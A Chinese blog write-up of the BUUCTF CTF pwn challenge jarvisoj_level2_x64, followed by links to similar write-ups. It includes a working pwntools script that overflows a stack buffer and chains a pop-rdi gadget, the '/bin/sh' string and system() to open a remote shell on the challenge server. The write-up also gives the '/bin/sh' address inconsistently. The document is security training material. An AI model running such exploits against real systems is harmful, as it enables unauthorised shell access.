[BUUCTF]PWN——jarvisoj_level2_x64

最新推荐文章于 2025-04-09 20:11:51 发布
原创 最新推荐文章于 2025-04-09 20:11:51 发布
· 1.8k 阅读 · 1 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客内容涉及了对64位程序jarvisoj_level2_x64的逆向分析,通过IDA查看,发现存在溢出漏洞。攻击者可以通过构造特定payload,利用系统地址0x40063E,shell地址0x600A90和rdi地址0x4006B3,触发溢出并执行自定义shellcode。最终,通过远程连接到服务器node3.buuoj.cn的29055端口,发送payload并启动交互式会话来利用这个漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

jarvisoj_level2_x64

例行检查 ,64位,开启NX保护,
在这里插入图片描述
运行一下
在这里插入图片描述
用IDA打开。
在这里插入图片描述
systemaddr=0x40063e
在这里插入图片描述

shalladdr=0x400A90

查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。
在这里插入图片描述
rdiaddr= 0x4006b3

在这里插入图片描述

from pwn import *

context(log_level = 'debug')
elf = ELF('./level2_x64')
p = remote('node3.buuoj.cn',29055)

systemaddr=0x40063E
shelladdr=0x600a90
rdiaddr=0x4006b3

payload= 'a'*(0x80+8)+p64(rdiaddr)+p64(shelladdr)+p64(systemaddr)

p.sendline(payload)
p.interactive()

在这里插入图片描述

(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1492
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
BUUCTF Pwn jarvisoj_level21解题步骤
2301_81505831的博客
02-04 392
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 526
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
BUUCTF(Misc)——面具下的flag
最新发布
weixin_74738833的博客
04-09 1241
BUUCTF(Misc)——面具下的flag
BUUCTF pwn——jarvisoj_level2_x64
CNS-Enterprise BCC-1701-J
04-03 333
BUUCTF 做题练习
[BUUCTF-pwn]——jarvisoj_level2_x64
Y_peak的博客
02-11 422
[BUUCTF-pwn]——jarvisoj_level2_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64 checksec 一下,64位 ,开启NX保护 64位应该会用到pop rdi这个汇编指令 在IDA中看看 思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数 exploit from pwn import * p = remote("node3.buuoj.cn",27828) b
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 432
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
BUUCTF-PWN】13-jarvisoj_level2_x64
燕麦葡萄干的博客
07-05 676
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 580
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 776
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 368
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 601
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTFjarvisoj_level2_x64 Write Up
古月浪子的博客
08-06 705
漏洞函数里面可以看到,我们可以栈溢出 题目使用了system函数,我们可以直接调用 程序里面藏了一个binsh 接下来只需要构造rop链了 64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它 再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈 from pwn import * from LibcSearcher import * from struct import pack context..
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 557
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 382
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
BUUCTF Pwn jarvisoj_level2_x64 题解
qq_33348179的博客
12-05 458
运行 得到flag flag{4b1340f5-06be-4377-9630-fd2c77f016dd}这是64位程序 所以构造ROP链时要用rdi传参+用ret栈平衡。SHIFT+F12查找字符串 找到了binsh。看到输入的payload压入栈中了。1.下载 checksec。64位 用IDA64打开。函数里面也有system。
BUUCTF-Pwn-jarvisoj_level2
餐桌上的猫
02-15 2396
题目截图 检查文件信息,开启了NX 用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用 查看函数表存在system函数 进入主函数反汇编查看 进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshell exp from pwn import* r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024 call_system=0x8048
jarvisoj_level2_x64
、moddemod
06-17 560
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值